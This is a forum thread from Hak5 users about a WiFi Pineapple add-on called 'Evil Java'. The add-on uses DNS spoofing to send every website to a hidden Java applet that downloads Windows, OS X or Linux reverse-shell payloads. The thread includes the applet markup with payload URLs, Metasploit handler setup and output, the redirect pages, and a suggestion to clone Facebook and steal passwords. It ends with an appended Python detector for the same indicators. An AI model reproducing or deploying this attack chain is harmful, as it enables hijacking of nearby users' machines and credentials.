reflex, posted February 7, 2012 (edited)

Edit: Uploaded again to fix the run.html pointing to the comp rather than itself. Thanks Whistle Master.

EDIT: I'm such a noob, I uploaded the files but not the ones I'd been working on; the index.html was meant to be named run.html. Have renamed them and posted new link. Everything should be working fine now.

Hi Hak5 community, thought I would post this and give something back for once.

I've added an option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux, which is selected depending on their OS (victim needs to have Java installed).

Screens
http://i.imgur.com/z5uHj.png
http://i.imgur.com/tgtGH.png
http://i.imgur.com/nM8KU.png
http://i.imgur.com/VUkJd.png
http://i.imgur.com/KWMfA.jpg
http://i.imgur.com/PWfrT.jpg

SETUP
1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l
2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option.
3. Copy the "java" folder to /www/
4. Click Conf next to the "Evil Java" option for commands to set up listeners.
5. Enable "Evil Java" and sit back.

ABOUT
All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome).
All payloads are set to connect back to 172.16.42.42 so make sure that's your IP.
Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2

Have Fun ;)
Reflex!

Edited March 17, 2012 by reflex

Mr-Protocol, posted February 7, 2012

Another option could be to run S.E.T., set up the Java applet attack and just do a line or two in the redirect.php or DNS for specific sites (facebook, gmail, etc.). But I may check this out.

reflex, posted February 7, 2012 (edited)

Yeh, but it's actually hosted on the pineapple so no messing about with SET, just a flick of a switch and copy n paste the commands in the Conf, or even better download this script http://www.mediafire.com/?hso7cx01cvgmffm and run "msfconsole -r pineapplepwn.rc"

Edited February 7, 2012 by reflex

Darren Kitchen, posted February 7, 2012

Awesome stuff reflex! Thanks for contributing to the project :)

Whistle Master, posted February 11, 2012

Hi reflex!

Just a quick question: I had a look at the file run.html and I was wondering why the values of the Java Applet are pointing to 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no?

    <applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
    <param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5">
    <param name="STUFF" value="">
    <param name="OSX" value="http://172.16.42.42:80/mac.bin">
    <param name="LINUX" value="http://172.16.42.42:80/nix.bin">

Thanks!

reflex, posted February 12, 2012

> Hi reflex!
>
> Just a quick question: I had a look at the file run.html and I was wondering why the values of the Java Applet are pointing to 172.16.42.42, which is the computer IP, instead of the pineapple IP 172.16.42.1, as the payloads are stored on it, no?
>
>     <applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
>     <param name="WINDOWS" value="http://172.16.42.42:80/Qf8IYZJlKNMdl5">
>     <param name="STUFF" value="">
>     <param name="OSX" value="http://172.16.42.42:80/mac.bin">
>     <param name="LINUX" value="http://172.16.42.42:80/nix.bin">
>
> Thanks!

Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The payloads are on the pineapple. Set your IP to 172.16.42.42, then click Conf and copy paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run the payload will connect back to 172.16.42.42.

Whistle Master, posted February 12, 2012

> Read the readme file. 172.16.42.42 has to be your IP and you have to click Conf to get the commands to set up the listeners. The payloads are on the pineapple. Set your IP to 172.16.42.42, then click Conf and copy paste them into the terminal, then turn on Evil Java on the pineapple and all pages get redirected to the applet. If someone clicks run the payload will connect back to 172.16.42.42.

I did read the instructions but the attack was not working correctly...

According to SEC blog: The applet has to read the operating system specific payload path and the url of the next page to show from its parameters. Then it will check on which platform it is currently running and start to download a specific payload using the browser it runs under.

With your run.html file, the applet cannot download the specific payloads from IP 172.16.42.42 (except if you are running a web server delivering the payloads) as they are on the pineapple 172.16.42.1 and in the folder /www/java/

I therefore modified your run.html to the following and it works perfectly:

    <applet width="1" height="1" id="Secure Java Applet" code="Java.class" archive="Signed_Update.jar">
    <param name="WINDOWS" value="http://172.16.42.1:80/java/Qf8IYZJlKNMdl5">
    <param name="STUFF" value="">
    <param name="OSX" value="http://172.16.42.1:80/java/mac.bin">
    <param name="LINUX" value="http://172.16.42.1:80/java/nix.bin">

telot, posted February 12, 2012

Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Here's my scenario:

- Fresh reflash to 2.1.2
- Run wp3.sh
- Copy java to /www/ on the pineapple
- Copy contents of pineapple/ to /www/pineapple, overwriting all
- Browse to 172.16.42.1/pineapple
- Start karma
- Click Conf for java attack
- Copy/paste windows attack into my BT5 terminal
- Wait for it to load
- Go back to mainpage for pineapple (Status)
- Click "Start" for java attack

And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Master's modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated.

Thanks!
telot

Whistle Master, posted February 12, 2012 (edited)

> Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Here's my scenario:
>
> - Fresh reflash to 2.1.2
> - Run wp3.sh
> - Copy java to /www/ on the pineapple
> - Copy contents of pineapple/ to /www/pineapple, overwriting all
> - Browse to 172.16.42.1/pineapple
> - Start karma
> - Click Conf for java attack
> - Copy/paste windows attack into my BT5 terminal
> - Wait for it to load
> - Go back to mainpage for pineapple (Status)
> - Click "Start" for java attack
>
> And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Master's modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated.
>
> Thanks!
> telot

You also have to start DNS Spoof for this attack.

The enable "Evil Java" action does the following:
- Change the DNS Spoof settings to redirect all sites to the pineapple;
- Change the landing page.

But you can do it manually. Go to Configuration:
- Edit DNS Spoof Host to capture all hosts: 172.16.42.1 *
- Edit Landing Page (phishing) to change redirection: to content=“0;url=/java/run.html”

EDIT: I added a guide on the wiki

Edited February 12, 2012 by Whistle Master

reflex, posted February 14, 2012 (edited)

The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echoes the word "up" into it. That way the pineapple can tell when it's on. When you stop, it echoes "" into it, telling it it's off. Check that the file up is in the pineapple dir and that it says up by the "cat up" command when you have started the Evil Java.

Thanks to Whistle Master for noticing that in the run.html; have uploaded again and this time should be fixed.

Edited February 14, 2012 by reflex

telot, posted February 17, 2012

> The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echoes the word "up" into it. That way the pineapple can tell when it's on. When you stop, it echoes "" into it, telling it it's off. Check that the file up is in the pineapple dir and that it says up by the "cat up" command when you have started the Evil Java.
>
> Thanks to Whistle Master for noticing that in the run.html; have uploaded again and this time should be fixed.

I think we need some consistency here with this new Java attack. There's lots of conflicting claims and none of them have been working for me. Anyone else having problems? I'm sure there's many ways to skin this cat. Reflex, since you discovered/initially designed this, could you do a once over on your instructions and fill in some gaps for us? Maybe I'm just a noob, but I'm having multiple issues and errors when trying to implement either solution (yours or Whistle Master's).

Thanks for any help you can spare
telot

Whistle Master, posted February 17, 2012

Telot, can you tell us at which step you are blocked?

Try to log in on the pineapple through SSH to see if you have all the files in the www folder:

    ls -la /www/ && ls -la /www/java/

Did you try my instructions on the wiki?

telot, posted February 19, 2012

Alrighty - sorry for the delay in my response, but I've been traveling the country and forgot my pineapple at home :(

Here is the output of the ls -la commands:

    root@Pineapple:~# ls -la /www/ && ls -la /www/java/
    drwxrwxr-x 1 root root 0 Jan 1 00:03 .
    drwxr-xr-x 1 root root 0 Jan 1 00:02 ..
    -rw-rw-r-- 1 root root 616 Jan 26 2012 error.php
    -rw-rw-r-- 1 root root 106 Jan 1 00:07 index.php
    drwxr-xr-x 2 root root 0 Jan 1 00:03 java
    drwxrwxr-x 1 root root 0 Jan 1 00:04 pineapple
    -rw-rw-r-- 1 root root 214 Jan 26 2012 redirect.php
    drwxr-xr-x 2 root root 0 Jan 1 00:03 .
    drwxrwxr-x 1 root root 0 Jan 1 00:03 ..
    -rw-r--r-- 1 root root 73802 Jan 1 00:03 Qf8IYZJlKNMdl5
    -rw-r--r-- 1 root root 4124 Jan 1 00:03 Signed_Update.jar
    -rwxr-xr-x 1 root root 20800 Jan 1 00:03 mac.bin
    -rw-r--r-- 1 root root 134 Jan 1 00:03 nix.bin
    -rw-r--r-- 1 root root 14862 Jan 1 00:03 run.html

Looks about right by me.

My DNS Spoof Host box under Configuration on the pineapple reads as follows:

    172.16.42.1 *

My Landing Page, again under Configuration on the pineapple, is as follows:

    <html>
    <head>
    <meta http-equiv="REFRESH" content=“0;url=/java/run.html”>
    </head>
    <body>
    </body>
    </html>

I start karma and start DNS Spoof from the Status page of the pineapple.
Then I download/unzip pineapplepwn.rc msf script and open a terminal and run msfconsole -r pineapplepwn.rc and here is the output:

    root@root:~/Desktop# msfconsole -r pineapplepwn.rc
    [-] Failed to connect to the database: FATAL: no pg_hba.conf entry for host "172.16.42.249", user "msf3", database "msf3"
     {"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"eccd8310", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5}

           =[ metasploit v4.0.0-release [core:4.0 api:1.0]
    + -- --=[ 716 exploits - 361 auxiliary - 68 post
    + -- --=[ 226 payloads - 27 encoders - 8 nops
           =[ svn r13462 updated 202 days ago (2011.08.01)

    Warning: This copy of the Metasploit Framework was last updated 202 days ago.
             We recommend that you update the framework at least every other day.
             For information on updating your copy of Metasploit, please see:
                 https://community.rapid7.com/docs/DOC-1306

    resource (pineapplepwn.rc)> use multi/handler
    resource (pineapplepwn.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (pineapplepwn.rc)> set LHOST 172.16.42.42
    LHOST => 172.16.42.42
    resource (pineapplepwn.rc)> set LPORT 443
    LPORT => 443
    resource (pineapplepwn.rc)> set ExitOnSession false
    ExitOnSession => false
    resource (pineapplepwn.rc)> exploit -j
    [*] Exploit running as background job.
    resource (pineapplepwn.rc)> use multi/handler
    resource (pineapplepwn.rc)> set PAYLOAD osx/x86/shell_reverse_tcp
    PAYLOAD => osx/x86/shell_reverse_tcp
    resource (pineapplepwn.rc)> set LHOST 172.16.42.42
    LHOST => 172.16.42.42
    resource (pineapplepwn.rc)> set LPORT 8080
    LPORT => 8080
    resource (pineapplepwn.rc)> set InitialAutoRunScript post/osx/gather/enum_osx
    InitialAutoRunScript => post/osx/gather/enum_osx
    resource (pineapplepwn.rc)> set ExitOnSession false
    ExitOnSession => false
    resource (pineapplepwn.rc)> exploit -j
    [-] Handler failed to bind to 172.16.42.42:443
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler...
    [*] Exploit running as background job.
    resource (pineapplepwn.rc)> use multi/handler
    resource (pineapplepwn.rc)> set PAYLOAD linux/x86/shell/reverse_tcp
    PAYLOAD => linux/x86/shell/reverse_tcp
    resource (pineapplepwn.rc)> set LHOST 172.16.42.42
    LHOST => 172.16.42.42
    resource (pineapplepwn.rc)> set LPORT 8081
    LPORT => 8081
    resource (pineapplepwn.rc)> set ExitOnSession false
    ExitOnSession => false
    resource (pineapplepwn.rc)> exploit -j
    [-] Handler failed to bind to 172.16.42.42:8080
    [*] Started reverse handler on 0.0.0.0:8080
    [*] Starting the payload handler...
    [*] Exploit running as background job.
    [-] Handler failed to bind to 172.16.42.42:8081
    [*] Started reverse handler on 0.0.0.0:8081
    [*] Starting the payload handler...
    msf exploit(handler) >

Now as I've said before, I'm a total metasploit noob. I'm only on the second chapter of securitytube's megaprimer on it. But even as a noob this output does not look good. Many fatal exceptions and Failed to binds.

Pressing forward regardless, I connect my target machine to its Karma'd pineapple AP of Caribou (a local coffee shop's wifi). Which by the way, Windows7 pops up with a "Additional log on information may be required" bubble.
Ignoring this I open Firefox and browse to www.facebook.com and get a white page that says "No such file or directory" and in the address bar is www.facebook.com/java/run.html" (with that end quote). Not only that, but when my attacking machine tries to browse the internet, it goes to www.hak5.org/run/java.html" - so the DNS spoof spoofed the attacking machine's DNS as well?! This is the first time I've played with DNS spoof, so my noobery is again rearing its ugly head.

Is it a problem with DNS Spoof? Is it a problem with the msf script? Did I make some noob mistake? Most likely I'm sure :) Any ideas or further advice would be greatly appreciated.

Thanks very much!
telot

Whistle Master, posted February 20, 2012

You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources:

    svn update

Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ").

Try to replace your landing page configuration with the following (with correct ones):

    <html>
    <head>
    <meta http-equiv="REFRESH" content="0;url=/java/run.html">
    </head>
    <body>
    </body>
    </html>

telot, posted February 23, 2012

> You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources:
>
>     svn update
>
> Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ").
>
> Try to replace your landing page configuration with the following (with correct ones):
>
>     <html>
>     <head>
>     <meta http-equiv="REFRESH" content="0;url=/java/run.html">
>     </head>
>     <body>
>     </body>
>     </html>

Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master

telot

d3cryption, posted February 25, 2012

> Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master
>
> telot

telot, did you ever get the disable problem fixed? If so, what fixed it? I'm having the same problem....

telot, posted February 25, 2012

> telot, did you ever get the disable problem fixed? If so, what fixed it? I'm having the same problem....

Nope - haven't gotten a chance to test it out till today. I will report my results this afternoon or tomorrow morning. I def want to get this working!!

telot

RebelCork, posted March 18, 2012

> Edit: Uploaded again to fix the run.html pointing to the comp rather than itself. Thanks Whistle Master.
>
> EDIT: I'm such a noob, I uploaded the files but not the ones I'd been working on; the index.html was meant to be named run.html. Have renamed them and posted new link. Everything should be working fine now.
>
> Hi Hak5 community, thought I would post this and give something back for once.
>
> I've added an option to the MK3 Pineapple to redirect all websites to an Evil Java applet that has a payload for Windows, OSX, and Linux, which is selected depending on their OS (victim needs to have Java installed).
>
> Screens
> http://i.imgur.com/z5uHj.png
> http://i.imgur.com/tgtGH.png
> http://i.imgur.com/nM8KU.png
> http://i.imgur.com/VUkJd.png
> http://i.imgur.com/KWMfA.jpg
> http://i.imgur.com/PWfrT.jpg
>
> SETUP
> 1. Download and unzip "pineapple-java-applet-attack.7z" with the password "pineapple" from here http://www.mediafire.com/?5an6gg1byj23m9l
> 2. Copy all files from the "pineapple" folder to /www/pineapple/ replacing the index.php for an updated user interface with "Evil Java" option.
> 3. Copy the "java" folder to /www/
> 4. Click Conf next to the "Evil Java" option for commands to set up listeners.
> 5. Enable "Evil Java" and sit back.
>
> ABOUT
> All websites will be redirected to the Java Applet Attack when enabled (except for Google when using Chrome).
> All payloads are set to connect back to 172.16.42.42 so make sure that's your IP.
> Tested on the MK3 with WebUI version: 1.0.4 and Firmware version: 2.1.2
>
> Have Fun ;)
> Reflex!

Do you still need the extra script to run in metasploit?

Whistle Master, posted March 19, 2012

The extra script is only to simplify your life when setting up the attack :) I uploaded it again and edited the wiki.

techsavvy34, posted March 20, 2012

Does anyone know if this will work on the pineapple mark iv?

Whistle Master, posted March 20, 2012

It does. It's just a matter of redirecting all sites in the dns spoof configuration to the java index.html file.

RebelCork, posted March 20, 2012

> Does anyone know if this will work on the pineapple mark iv?

The attack itself will work on mkiv, although the index.php file that is included in the package should not be uploaded. Instead you can back up your existing index.php file in the pineapple folder before making any changes:

    cp index.php index.bak

Open the one from the package above (MKIII), copy the following code and paste it into the php segment of your MKIV index.php file:

    // The "up" state file holds "up" while Evil Java is enabled and is empty otherwise.
    $isjavaup = exec("cat up");
    if ($isjavaup != "") {
        echo "Evil Java is currently <font color=\"lime\"><b>enabled</b></font>. | <a href=\"stopjava.php\"><b>Stop</b></a><br />";
    } else {
        echo "Evil Java is currently <font color=\"red\"><b>disabled</b></font>. | <a href=\"startjava.php\"><b>Start</b></a> | <a href=\"conf.php\"><b>Conf</b></a><br/>";
    }

Reboot your pineapple, and you should see the Evil Java option. Change your landing page to redirect to /java/run.html

So far on my tests, this has worked for me, with access to metasploit working. The only thing is, the switch status (on/off) does not work.

I hope that helps, but I'm a metasploit newbie myself!

killuminati, posted March 20, 2012

Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interface with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know ur on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but there's an issue with the switch showing "on"?

Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (i.e. airmon-ng, urlsnarf, arp)

RebelCork, posted March 21, 2012 (edited)

> Why can't it be uploaded? I replaced mine but made a back up and now I have the mark III interface with all the amazing goodness of urlsnarf, ngrep on the status page ui. I just edited the file where it said mark3 to Mark IV for a little personal touch ;D glad to know ur on/off button isn't working either. However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but there's an issue with the switch showing "on"?
>
> Question I have though for the guys at hak5 is why was the mark 3 interface replaced with the current mark IV? Was it a time issue or something? I quite like the old interface with the easy to read display of various items (i.e. airmon-ng, urlsnarf, arp)

I think ngrep and urlsnarf aren't 100% functional on MKIV. (Sebkinne says: ngrep is not installed currently) (Thought so: :) )

I think it's in the list of to fix for next release of firmware, if I'm right.

See this thread: MKIV - What we know and don't know

Projects on the collective to do list and issues that need attending:

- Network Pineapple Monkey - Seb has acknowledged it's on his list and will become higher priority after 1.0.1 firmware is released.
- See this thread: Adding Alfa AWUS036H to the Mark4: Darren commented: "...adding a 2nd WiFi Adapter, say with an AWUS036H, seems as likely as adding 3G -- so tethering is on the table." Official current status on getting it to work is unknown. During my trials, the Mark4 recognizes the realtek rtl8187 but does not assign it as a wlan adapter. Openwrt should have support for it through kmod-rtl8187
- Combining storage and 3G connectivity in one card: "Two birds, one stone". Many 3G usb cards have microSD slots. Novatel U760 is a prime example. Darren and hfam both have these cards and seem to be working on it.
- Ngrep is gone now and accessible only via SSH. (See: http://hak5.org/tag/ngrep for information on how to ngrep via terminal) (Sebkinne edit: It is gone. Dead. For now)
- URLsnarf is missing from the UI page, but is also accessible via SSH. Darren's comment on the matter: "We're working on a revised web UI for sniffing which should bring together the power of urlsnarf, ngrep and *ettercap" Swoot!
- Reaver is not present on Schmoocon version but will be via firmware update 1.0.1. Reaver has not yet been proven to work - a proper how to guide is needed. Issue lies with mon.wlan0 - what is it used for? Can we remove it and add a proper mon0? Do we need to? Will it affect Karma as I suspect? (I'm going to try my hand at it today!)
- Further 3G Dongle research - Darren's hints for us regarding 3G dongles: "Usually it's just a matter of "ejecting" the USB CD-ROM so that the modem reveals itself, at which point a bunch of uci network commands set the config, pppd does its thing with chat and comgt." - Need to clarify ejecting the usb cd-rom...
- Add support for encrypting USB drives using EncryptingFS or perhaps even truecrypt?
- Enable airdrop-ng support by installing python and other dependencies to usb drive

telot

Edited March 21, 2012 by RebelCork

RebelCork, posted March 21, 2012

> However when I connect to my pineapple wifi and log into a site it does show a java box but need to look into it more. I'm thinking it's running but there's an issue with the switch showing "on"?

DNS Spoof is running and you have the run.html offering up a java attack applet. It will run constantly; you can't turn it off without replacing the redirected page.

If you really wanted to, you could try altering an existing web page to inject the java code for the user instead of a blank page. For example, clone www.facebook.com and insert the code into the webpage. That way, when your victim machine browses to the infected page the script is run automatically and they are not sitting looking at a blank screen. Also a particularly nasty attack would be to disguise the attack vector as one of the many popular FB games.

With an active internet connection to the pineapple, the victim will continue on his/her way to the login page, and you get the chance to steal passwords as well.

These are some of the theoretical situations I am trying to defend against. (I am trying to write a term paper for college on MITM attacks)

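Added example, not part of the thread or of any poster's files: a client-side check for the two indicators the thread describes, namely a wildcard DNS spoof entry ("172.16.42.1 *") that makes unrelated public names resolve to one private address, and a landing page that instantly redirects to a page embedding a 1x1 applet whose parameters are remote URLs. All function names, the sample records and pages (constructed, modelled on the markup quoted above), the local-suffix list, the last-two-labels domain heuristic and the min_names threshold are assumptions of this example.

```python
import ipaddress
from collections import defaultdict
from html.parser import HTMLParser

# Constructed sample data (not captured traffic): names a client resolved
# while associated to a suspect access point, with the address returned.
SAMPLE_DNS_ANSWERS = [
    ("www.facebook.com", "172.16.42.1"),
    ("mail.google.com", "172.16.42.1"),
    ("www.hak5.org", "172.16.42.1"),
    ("example.org", "172.16.42.1"),
    ("printer.lan", "192.168.1.20"),
]

# Constructed pages modelled on the markup quoted in the thread.
SAMPLE_LANDING = """<html><head>
<meta http-equiv="REFRESH" content="0;url=/java/run.html">
</head><body></body></html>"""

SAMPLE_APPLET_PAGE = """<html><body>
<applet width="1" height="1" code="Java.class" archive="Signed_Update.jar">
<param name="WINDOWS" value="http://172.16.42.1:80/java/Qf8IYZJlKNMdl5">
<param name="STUFF" value="">
<param name="OSX" value="http://172.16.42.1:80/java/mac.bin">
</body></html>"""

# Assumed list of suffixes that are expected to resolve to private space.
LOCAL_SUFFIXES = (".lan", ".local", ".internal", ".home.arpa")


def base_domain(name):
    """Naive last-two-labels heuristic (assumption; no public-suffix list)."""
    return ".".join(name.rstrip(".").lower().split(".")[-2:])


def find_dns_collapse(answers, min_names=3):
    """Map each private address to the unrelated public domains it answered for.

    A wildcard spoof entry makes every name resolve to one internal host, so
    several distinct base domains sharing one RFC 1918 address is the signal.
    """
    by_addr = defaultdict(set)
    for name, addr in answers:
        if name.lower().rstrip(".").endswith(LOCAL_SUFFIXES):
            continue  # internal names legitimately resolve to private space
        if ipaddress.ip_address(addr).is_private:
            by_addr[addr].add(base_domain(name))
    return {a: sorted(d) for a, d in by_addr.items() if len(d) >= min_names}


class PageAudit(HTMLParser):
    """Collect (finding, detail) tuples for redirect and applet indicators."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.in_applet = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            delay, _, target = a.get("content", "").partition(";")
            target = target.strip()
            if target.lower().startswith("url="):
                target = target[4:]
            if delay.strip() == "0" and target:
                self.findings.append(("instant-redirect", target))
        elif tag == "applet":
            self.in_applet = True  # stays set if the page never closes the tag
            dims = [a.get("width", ""), a.get("height", "")]
            if all(d.isdigit() and int(d) <= 1 for d in dims):
                self.findings.append(("hidden-applet", a.get("archive", "")))
        elif tag == "param" and self.in_applet:
            if a.get("value", "").lower().startswith(("http://", "https://")):
                self.findings.append(("applet-remote-param", a.get("name", "")))

    def handle_endtag(self, tag):
        if tag == "applet":
            self.in_applet = False


def audit_html(html):
    """Parse one HTML document and return its list of findings."""
    parser = PageAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    print(find_dns_collapse(SAMPLE_DNS_ANSWERS))
    print(audit_html(SAMPLE_LANDING))
    print(audit_html(SAMPLE_APPLET_PAGE))
```
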